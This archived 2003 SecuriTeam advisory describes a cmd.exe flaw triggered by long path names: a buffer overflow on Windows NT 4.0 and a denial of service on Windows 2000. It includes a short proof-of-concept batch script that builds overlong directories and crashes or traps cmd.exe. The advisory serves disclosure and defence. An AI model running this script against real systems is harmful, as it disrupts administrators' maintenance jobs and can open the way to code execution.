[NT] Windows NT 4.0/2000 cmd.exe Long Path Buffer Overflow/DoS

From: support@securiteam.com
Date: 02/15/03

  • Next message: support@securiteam.com: "[TOOL] Malloc() FWScrape, Filtering Characteristics Analyzer"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 15 Feb 2003 21:39:06 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Windows NT 4.0/2000 cmd.exe Long Path Buffer Overflow/DoS
    ------------------------------------------------------------------------

    SUMMARY

    cmd.exe is Windows NT OS family command processor. It has also used to
    process .bat and .cmd batch files. Many system administrator run batch
    files with elevated privileges for system maintenance. cmd.exe has a flow
    in processing "cd" command on long path name. Under Windows NT 4.0, it may
    cause buffer overflow, on Windows 2000 - failure of batch file processing.

    DETAILS

    Vulnerable systems:
     * Microsoft Windows NT 4.0 (buffer overflow)
     * Microsoft Windows 2000 (DoS)

    NTFS file system allows creating paths of almost unlimited length.
    However, Windows API does not allow path longer than 256 bytes. To prevent
    Windows API from checking requested path \\?\ prefix may be used for
    filename. This is documented feature of Windows API.

    cmd.exe from Windows NT 4.0 has trivial buffer overflow in CD command if
    destination path is longer than 256 characters. This vulnerability may be
    trivially exploited to execute code.

    cmd.exe from Windows 2000 has no buffer overflow, but than changing to
    directory with a path slightly longer than 256 characters (for example 260
    characters) cmd.exe becomes "jailed" in this directory, it means "cd .."
    command will fail. It may cause DoS against maintenance batch script.

    Exploitation:
    @echo off
    SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    A
    SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    mkdir \\?\c:\%A%
    mkdir \\?\c:\%A%\%A%
    mkdir \\?\c:\%A%\%B%\
    c:
    cd \
    cd AAAAAAAAAAAA*
    cd AAAAAAAAAAAA*
    cd BBBBBBBBBBBB*
    cd ..

    Creates a directory with two subdirectories. First one demonstrates buffer
    overflow on Windows NT 4.0 (second cd AAAAAAAAA* command will crash
    cmd.exe with EIP overwritten) second one demonstrates cmd.exe to change
    directory to AA...\BB..., but "cd .." command will fail.

    Vendor response:
    Microsoft acknowledged problem.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:3APA3A@SECURITY.NNOV.RU>
    3APA3A.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



    Relevant Pages

    • Re: Windows XP and DOS commands
      ... > Type a command with a space followed by a slash and question ... > CHKDSK Checks a disk and displays a status report. ... > CMD Starts a new instance of the Windows command ... > REM Records comments in batch files or ...
      (microsoft.public.windowsxp.general)
    • Re: Windows XP and DOS commands
      ... > Type a command with a space followed by a slash and question ... > CHKDSK Checks a disk and displays a status report. ... > CMD Starts a new instance of the Windows command ... > REM Records comments in batch files or ...
      (microsoft.public.windowsxp.general)
    • RE: re-setting boot partition
      ... Description of the Windows 2000 Recovery Console ... For a Microsoft Windows XP version of this article, ... MB of hard disk space on your system partition to hold the Cmdcons folder ... Windows NTBoot Console Command Interpreter. ...
      (microsoft.public.win2000.setup_upgrade)
    • Re: Windows XP and DOS commands
      ... there is a command line interface and many former DOS ... |> CHKDSK Checks a disk and displays a status report. ... |> DOSKEY Edits command lines, recalls Windows commands, and |> creates macros. ... |> SHIFT Shifts the position of replaceable parameters in |> batch files. ...
      (microsoft.public.windowsxp.general)
    • RE: Win2000 Upgrade to SP3 Express Setup error.
      ... Start your computer with the Windows Setup floppy disks, ... MB of hard disk space on your system partition to hold the Cmdcons folder ... Windows NTBoot Console Command Interpreter. ... you cannot copy a file from the local hard disk to a floppy disk. ...
      (microsoft.public.win2000.setup_upgrade)